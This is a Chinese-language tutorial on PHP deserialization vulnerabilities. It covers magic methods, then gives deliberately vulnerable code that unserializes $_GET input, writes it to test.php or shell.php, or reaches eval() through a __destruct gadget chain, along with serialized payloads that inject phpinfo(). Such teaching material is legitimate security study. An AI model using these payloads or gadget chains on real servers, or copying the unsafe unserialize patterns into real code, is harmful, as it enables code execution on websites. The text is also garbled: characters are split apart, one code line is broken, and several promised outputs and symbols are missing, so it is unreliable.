0x01 概述
什么是php反序列化漏洞呢?簡單的來說,就是在php反序列化的時候,反序列化的內(nèi)容是用戶可控,那么惡意用戶就可以構(gòu)造特定序列化內(nèi)容的代碼,通過unserialize()函數(shù)進(jìn)行特定的反序列化操作,并且程序的某處存在一些敏感操作是寫在類中的,那么就可以通過這段惡意代碼,達(dá)到執(zhí)行攻擊者想要的操作。
在了解php反序列化漏洞之前,需要了解一下php序列化和反序列化的相關(guān)知識。
0x02 PHP序列化與反序列化
<?php
class Test{
public $var = "This is a test";
public function PrintVar(){
echo this -> $var;
}
}
$obj = new Test();
$obj->PrintVar();
?>
運行后
magic 函數(shù)
php面向?qū)ο笞兂芍校幸活惡瘮?shù)叫做magic function,魔術(shù)函數(shù),這些函數(shù)是以__(雙下劃線)開頭的,他們是一些當(dāng)依照某些規(guī)則實例化類或者調(diào)用某些函數(shù)的時候會自動調(diào)用這些magic函數(shù),這里說一下比較常見的例如__construct,__destory,
__sleep,__wakeup,__toString函數(shù)。
__construct()
__contstruct()函數(shù)被稱為構(gòu)造函數(shù),當(dāng)實例化類的時候會自動調(diào)用該函數(shù)__destruct()
__destruct()函數(shù)被稱為析構(gòu)函數(shù),當(dāng)類結(jié)束的時候自動調(diào)用該函數(shù)__sleep()
__sleep()函數(shù)是當(dāng)php進(jìn)行序列化操作(serialize)的時候自動調(diào)用該函數(shù),可以用于清理對象,并返回一個包含對象中所有應(yīng)被序列化的變量名稱的數(shù)組。如果該方法未返回任何內(nèi)容,則 NULL 被序列化,并產(chǎn)生一個 E_NOTICE 級別的錯誤。__wakeup()
__wakeup()函數(shù)是當(dāng)php進(jìn)行反序列化操作(unserialize)的時候自動調(diào)用該函數(shù)__toString()
__toString()函數(shù)是當(dāng)對象被當(dāng)做字符串的時候會自動調(diào)用該函數(shù)
例如:
運行后結(jié)果:
私有成員與被保護(hù)成員變量的特殊性
當(dāng)類中的成員變量是私有的或者被保護(hù)的,那么會產(chǎn)生一些特殊的情況
運行結(jié)果:
我們可以看到,在序列化后得到的序列化代碼中,私有成員變量name前加了一個User,被保護(hù)變量成員age的前面加了一個,并且明明Username長度為8,但是卻顯示的是10;同樣,明明age的長度為4,但卻顯示的是6。
查閱php手冊發(fā)現(xiàn),當(dāng)成員變量是私有的時候,會在成員變量前面添加類名;當(dāng)成員變量是被保護(hù)的時候,會在被保護(hù)成員前面添加一個,并且,所添加的類名或者的左右兩邊都會有一個null字節(jié),因此,這兩個長度都增加了2。
0x03 PHP反序列化漏洞
- __wakeup()或__destruct()的利用場景
假設(shè)服務(wù)器的代碼如下:
<?php
class Test{
var $test = "123";
function __wakeup(){
$fp = fopen("test.php", 'w');
fwrite($fp, $this -> test);
fclose($fp);
}
}
$test1 = $_GET['test'];
print_r($test1);
echo "<br />";
$seri = unserialize($test1);
require "test.php";
?>
我們可以在本地搭建環(huán)境,編寫exp之后用serialize函數(shù)進(jìn)行序列化,得到payload,如:
O:4:"Test":1:{s:4:"test";s:18:"<?php%20phpinfo();?>";}
- 其他Magic Function情況
當(dāng)unserialize的時候不是直接在wakup魔術(shù)方法中利用,比如在construct之類的,也是有利用價值的。譬如,當(dāng)wakup中又調(diào)用了別的對象,那么我們就可以進(jìn)行回溯去找,也許也可以利用到。例如:
<?php
class Test1{
function __construct($test){
$fp = fopen("shell.php", "w");
fwrite($fp, $test);
fclose($fp);
}
}
class Test2{
var $test = "123";
function __wakeup(){
$obj = new Test1($this -> test);
}
}
$test = $_GET['test'];
unserialize($test);
require "shell.php";
?>
- 普通情況
當(dāng)危險代碼存在類的普通方法中,就不能指望通過“自動調(diào)用”來達(dá)到目的了。這時可以尋找相同的函數(shù)名,把敏感函數(shù)和類聯(lián)系在一起。
<?php
class Test1{
var $test1;
function __construct(){
$this->test1 = new Test2();
}
function __destruct(){
$this->test1->action();
}
}
class Test2{
function action(){
echo "Test2";
}
}
class Test3{
var $test3;
function action(){
eval($this->test3);
}
}
$test = new Test1();
unserialize($_GET['test']);
?>
這里我們可以利用Test3中的action函數(shù)中的eval函數(shù)做一些事情。
class Test1{
var $test1;
function __construct(){
$this->test1 = new Test3();
}
function __destruct(){
$this->test1->action();
}
}
class Test3{
var $test3 = "phpinfo();";
}
echo serialize(new Test1());
得到 O:5:"Test1":1:{s:5:"test1";O:5:"Test3":1:{s:5:"test3";s:10:"phpinfo();";}}
